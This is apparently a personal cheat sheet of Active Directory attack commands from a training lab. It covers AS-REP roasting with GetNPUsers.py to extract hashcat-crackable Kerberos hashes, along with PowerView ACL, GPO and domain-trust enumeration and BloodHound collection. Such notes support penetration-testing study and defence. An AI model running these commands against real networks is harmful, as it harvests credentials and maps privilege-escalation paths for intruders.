Windows AD enum notes

February 01, 2020

Windows AD Enum

As-Rep Roasting

No creds, but has a list of users in users.txt

while read p; do python3 GetNPUsers.py corp.local/${p} -dc-ip 10.10.10.1 -no-pass; done < users.txt

With creds: corp\attacker:PASSWORD

python3 GetNPUsers.py corp/attacker:PASSWORD -request -format hashcat  -outputfile h1.hash

Domain User Enum:

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} |?{$_.IdentityReference -match "users"}
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "users"}
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs -Verbose
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs -Verbose

Forest Enum:

Get-NetForestDomain -Verbose | Get-NetDomainTrust
Get-NetDomainTrust
Get-NetForestDomain -Verbose


Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}
Get-NetForestDomain -Forest eurocorp.local -Verbose | Get-NetDomainTrust
Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}

BloodHound

Invoke-BloodHound -CollectionMethod All

Invoke-BloodHound -CollectionMethod LoggedOn -Verbose

GPO Enum

Get-NetGPO
Get-NetOU UserMachines | %{Get-NetComputer -ADSPath $_}

Get-NetGroupMember -GroupName RDPUsers
Get-NetGPOGroup -Verbose

(Get-NetOU StudentMachines -FullData).gplink 
[LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]

 Get-NetGPO -ADSpath 'LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local'

links:
https://ired.team/
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

back